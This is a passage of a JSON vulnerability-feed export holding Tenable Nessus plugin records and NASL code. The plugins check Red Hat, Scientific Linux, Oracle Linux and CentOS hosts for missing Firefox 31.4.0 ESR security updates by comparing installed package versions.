dictionary for Firefox's spell checker is now correctly\nset to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 31.4.0 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n # https://www.mozilla.org/en-US/security/known-vulnerabilities/firefox-esr/#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b5eaff4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8638\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8641\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0046\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-debuginfo-31.4.0-1.el5_11\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-debuginfo-31.4.0-1.el6_6\", allowmaj:TRUE)) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-31.4.0-1.el7_0\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"firefox-debuginfo-31.4.0-1.el7_0\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xulrunner-31.4.0-1.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xulrunner-debuginfo-31.4.0-1.el7_0\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xulrunner-devel-31.4.0-1.el7_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:47", "description": "Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not follow the Cross-Origin Resource Sharing (CORS) specification. A web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nThis update also fixes the following bug :\n\n - The default dictionary for Firefox's spell checker is now correctly set to the system's locale language.\n\nAfter installing the update, Firefox must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64 (20150113)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xulrunner", "p-cpe:/a:fermilab:scientific_linux:xulrunner-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xulrunner-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150113_FIREFOX_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/80545", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80545);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL5.x, SL6.x, SL7.x i386/x86_64 (20150113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A\nweb page containing malicious content could allow a remote attacker to\nconduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nThis update also fixes the following bug :\n\n - The default dictionary for Firefox's spell checker is\n now correctly set to the system's locale language.\n\nAfter installing the update, Firefox must be restarted for the changes\nto take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=1000\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65b14813\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"firefox-31.4.0-1.el5_11\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"firefox-debuginfo-31.4.0-1.el5_11\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"firefox-31.4.0-1.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-31.4.0-1.el6_6\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-31.4.0-1.el7_0\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-31.4.0-1.el7_0\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xulrunner-31.4.0-1.el7_0\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xulrunner-debuginfo-31.4.0-1.el7_0\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xulrunner-devel-31.4.0-1.el7_0\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:47", "description": "From Red Hat Security Advisory 2015:0046 :\n\nUpdated firefox packages that fix multiple security issues and one bug are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not follow the Cross-Origin Resource Sharing (CORS) specification. A web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default dictionary for Firefox's spell checker is now correctly set to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain Firefox version 31.4.0 ESR, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : firefox (ELSA-2015-0046)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:firefox", "p-cpe:/a:oracle:linux:xulrunner", "p-cpe:/a:oracle:linux:xulrunner-devel", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-0046.NASL", "href": "https://www.tenable.com/plugins/nessus/80503", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0046 and \n# Oracle Linux Security Advisory ELSA-2015-0046 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80503);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_bugtraq_id(72044, 72046, 72047, 72049);\n script_xref(name:\"RHSA\", value:\"2015:0046\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : firefox (ELSA-2015-0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2015:0046 :\n\nUpdated firefox packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A\nweb page containing malicious content could allow a remote attacker to\nconduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original\nreporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 31.4.0 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default dictionary for Firefox's spell checker is now correctly\nset to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 31.4.0 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004784.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004786.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004789.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"firefox-31.4.0-1.0.1.el5_11\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"firefox-31.4.0-1.0.1.el6_6\", allowmaj:TRUE)) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"firefox-31.4.0-1.0.1.el7_0\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xulrunner-31.4.0-1.0.1.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xulrunner-devel-31.4.0-1.0.1.el7_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / xulrunner / xulrunner-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:48:25", "description": "Updated firefox packages that fix multiple security issues and one bug are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not follow the Cross-Origin Resource Sharing (CORS) specification. A web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default dictionary for Firefox's spell checker is now correctly set to the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain Firefox version 31.4.0 ESR, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect.", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "CentOS 5 / 6 / 7 : firefox / xulrunner (CESA-2015:0046)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:firefox", "p-cpe:/a:centos:centos:xulrunner", "p-cpe:/a:centos:centos:xulrunner-devel", "cpe:/o:centos:centos:5", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-0046.NASL", "href": "https://www.tenable.com/plugins/nessus/80526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0046 and \n# CentOS Errata and Security Advisory 2015:0046 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80526);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_bugtraq_id(72044, 72046, 72047, 72049);\n script_xref(name:\"RHSA\", value:\"2015:0046\");\n\n script_name(english:\"CentOS 5 / 6 / 7 : firefox / xulrunner (CESA-2015:0046)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated firefox packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A\nweb page containing malicious content could allow a remote attacker to\nconduct a Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Christian Holler, Patrick McManus,\nMuneaki Nishimura, Xiaofeng Zheng, and Mitchell Harper as the original\nreporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 31.4.0 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis update also fixes the following bug :\n\n* The default dictionary for 